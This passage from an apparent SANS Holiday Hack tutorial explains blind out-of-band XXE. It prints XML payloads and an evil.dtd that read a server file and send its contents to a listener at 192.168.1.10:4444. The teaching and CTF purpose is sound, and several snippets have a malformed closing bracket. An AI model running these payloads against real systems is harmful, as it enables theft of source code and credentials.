However, XML has defined well-formed restrictions that would prohibit the above example. As such, the above example would not load our file at c:/inetpub/wwwroot/Views/secret_source.cshtml and would instead produce an error.

What about entity inception? We could try to embed an entity within an entity within our XML payload. For example:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
    <!ELEMENT demo ANY >
    <!ENTITY % extentity "<!ENTITY stolendata SYSTEM ‘file:///c:/inetpub/wwwroot/Views/secret_source.cshtml’>">
    %extentity;
    ]
<

Unfortunately, this is also not possible due to XML well-formed restrictions prohibiting external entities from being declared in the value.

We know that we cannot reference a file on our system but we can have the parser grab a resource from a URI. We could attempt to load a Data Type Definition (DTD) file to accomplish this instead. DTD files are files that are loaded prior to an XML file being parsed and tells the parser how to properly interpret an XML file. Let’s attempt to embed our restricted entity payloads in our DTD file to bypass these restrictions.

For example, we could load the following xml file into our parser which points to a DTD file. When %extentity; is called, it loads the contents of our DTD file (evil.dtd) at the provided URI:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
     <!ELEMENT demo ANY >
     <!ENTITY % extentity SYSTEM "http://192.168.1.10:4444/evil.dtd">
     %extentity;
      ]
>

We would then need to have a web server listening on port 4444 at the above IP address with the evil.dtd file located at the root of the web directory. What’s in this magical DTD file you ask? Well, I’ll show you:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % stolendata SYSTEM "file:///c:/inetpub/wwwroot/Views/secret_source.cshtml">
<!ENTITY % inception "<!ENTITY % sendit SYSTEM 'http://192.168.1.10:4444/?%stolendata;'>">

Line 1 of the above DTD file declares the XML version and encoding. Line 2 declares that we want to grab the contents of a sensitive file. In line 3 we perform entity inception and append the contents of the stolendata file to a URI. This URI will be our webserver listening on port 4444. By doing this, we are able to bypass the XML well-formed restrictions that we attempted to embed earlier in our original XML payload.
xxe1

The above illustration shows us the first few steps of the process:

1. We upload our original XML payload which points the system to load a DTD file from our remote web server.

2. The XML parser reaches out to the designated URI to retrieve DTD contents.

3. XML parser loads the contents of the DTD into the pre-processing of the original XML payload.

At this point, we have successfully bypassed the well-formed restrictions. However, we still need to call the entities we declared in our DTD file in order to retrieve the contents of secret_source.cshtml and send them back to our webserver. To do this, we would need to insert %inception; and %sendit; after %extentity; in our original XML file before we send the payload. Our original XML payload should now look something like this:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
    <!ELEMENT demo ANY >
    <!ENTITY % extentity SYSTEM "http://192.168.1.10:4444/evil.dtd">
    %extentity;
    %inception;
    %sendit;
    ]
<

xxe2

That’s it! As long as we had a webserver or a Netcat listener setup on port 4444, the XML parser would send back the contents of the target file (secret_source.cshtml) embedded in the URI of the GET request. Source files containing sensitive information like database passwords and encryption keys exfiltrated using this method could then be leveraged to escalate to more valuable content from there.

Note: There are certain limitations to this technique as the XML parser will produce an error if the file content exceeds 2000 bytes in total length due to URI length restrictions.

Useful Links:

OWASP: XML External Entity (XXE) Processing

XML Security Cheat Sheet

Microsoft: ENTITY (XML) .NET Framework

W3schools: XML DTD

-Chris Davis
Counter Hack

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02